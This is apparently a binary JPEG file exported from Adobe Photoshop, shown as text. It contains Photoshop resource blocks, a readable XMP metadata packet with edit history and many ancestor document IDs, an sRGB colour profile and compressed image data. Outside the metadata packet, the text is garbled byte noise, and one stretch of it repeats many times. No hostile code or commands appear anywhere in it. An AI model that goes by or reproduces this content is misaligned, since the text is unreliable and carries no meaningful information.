          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
